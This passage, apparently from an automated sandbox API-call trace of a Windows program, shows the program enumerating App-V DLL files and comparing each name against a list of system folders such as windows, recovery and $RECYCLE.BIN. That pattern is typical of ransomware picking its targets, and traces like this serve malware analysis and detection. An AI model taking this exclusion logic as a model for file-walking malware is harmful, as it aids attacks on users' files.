ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x336d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVIsvStreamingManager.dll", cAlternateFileName="APPVIS~4.DLL")) returned 1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2=".") returned 1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="..") returned 1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="...") returned 1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="windows") returned -1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="recovery") returned -1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="perflogs") returned -1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="documents and settings") returned -1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="system volume information") returned -1 [0067.554] lstrcmpiW (lpString1="AppVIsvStreamingManager.dll", lpString2="msocache") returned -1 [0067.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvStreamingManager.dll", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvStreamingManager.dll", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvStreamingManager.dll", lpUsedDefaultChar=0x0) returned 27 [0067.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvStreamingManager.dll", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvStreamingManager.dll", cchWideChar=27, lpMultiByteStr=0x241128, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvStreamingManager.dll", lpUsedDefaultChar=0x0) returned 27 [0067.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0067.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.555] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1566d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVIsvSubsystemController.dll", cAlternateFileName="AP213A~1.DLL")) returned 1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2=".") returned 1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="..") returned 1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="...") returned 1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="windows") returned -1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="recovery") returned -1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="perflogs") returned -1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="documents and settings") returned -1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="system volume information") returned -1 [0067.555] lstrcmpiW (lpString1="AppVIsvSubsystemController.dll", lpString2="msocache") returned -1 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystemController.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystemController.dll", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvSubsystemController.dll", lpUsedDefaultChar=0x0) returned 30 [0067.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystemController.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0067.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystemController.dll", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvSubsystemController.dll", lpUsedDefaultChar=0x0) returned 30 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.556] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18d60800, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0a8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppvIsvSubsystems32.dll", cAlternateFileName="AP3342~1.DLL")) returned 1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2=".") returned 1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="..") returned 1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="...") returned 1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="windows") returned -1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="recovery") returned -1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="perflogs") returned -1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="documents and settings") returned -1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="system volume information") returned -1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems32.dll", lpString2="msocache") returned -1 [0067.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0067.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x240f98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 23 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0067.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x2412e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 23 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0067.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0067.556] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acba0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80acba0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbbdc5100, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x22e0a8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppvIsvSubsystems64.dll", cAlternateFileName="AP4400~1.DLL")) returned 1 [0067.556] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2=".") returned 1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="..") returned 1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="...") returned 1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="windows") returned -1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="recovery") returned -1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="perflogs") returned -1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="documents and settings") returned -1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="system volume information") returned -1 [0067.557] lstrcmpiW (lpString1="AppvIsvSubsystems64.dll", lpString2="msocache") returned -1 [0067.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 23 [0067.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppvIsvSubsystems64.dll", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppvIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 23 [0067.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0067.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0067.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.557] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x8a8d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVIsvVirtualization.dll", cAlternateFileName="AP485B~1.DLL")) returned 1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2=".") returned 1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="..") returned 1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="...") returned 1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="windows") returned -1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="recovery") returned -1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="perflogs") returned -1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="documents and settings") returned -1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="system volume information") returned -1 [0067.557] lstrcmpiW (lpString1="AppVIsvVirtualization.dll", lpString2="msocache") returned -1 [0067.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvVirtualization.dll", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvVirtualization.dll", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvVirtualization.dll", lpUsedDefaultChar=0x0) returned 25 [0067.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvVirtualization.dll", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvVirtualization.dll", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvVirtualization.dll", lpUsedDefaultChar=0x0) returned 25 [0067.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0067.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0067.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.558] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x12cad8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVManifest.dll", cAlternateFileName="APPVMA~1.DLL")) returned 1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2=".") returned 1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="..") returned 1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="...") returned 1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="windows") returned -1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="recovery") returned -1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="perflogs") returned -1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="documents and settings") returned -1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="system volume information") returned -1 [0067.558] lstrcmpiW (lpString1="AppVManifest.dll", lpString2="msocache") returned -1 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVManifest.dll", lpUsedDefaultChar=0x0) returned 16 [0067.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVManifest.dll", cchWideChar=16, lpMultiByteStr=0x240f70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVManifest.dll", lpUsedDefaultChar=0x0) returned 16 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.559] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xe76d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="AppVOrchestration.dll", cAlternateFileName="APPVOR~1.DLL")) returned 1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2=".") returned 1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="..") returned 1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="...") returned 1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="windows") returned -1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="recovery") returned -1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="perflogs") returned -1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="documents and settings") returned -1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="system volume information") returned -1 [0067.559] lstrcmpiW (lpString1="AppVOrchestration.dll", lpString2="msocache") returned -1 [0067.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOrchestration.dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0067.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOrchestration.dll", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVOrchestration.dll", lpUsedDefaultChar=0x0) returned 21 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOrchestration.dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0067.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0067.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVOrchestration.dll", cchWideChar=21, lpMultiByteStr=0x2411f0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVOrchestration.dll", lpUsedDefaultChar=0x0) returned 21 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0067.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.559] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, 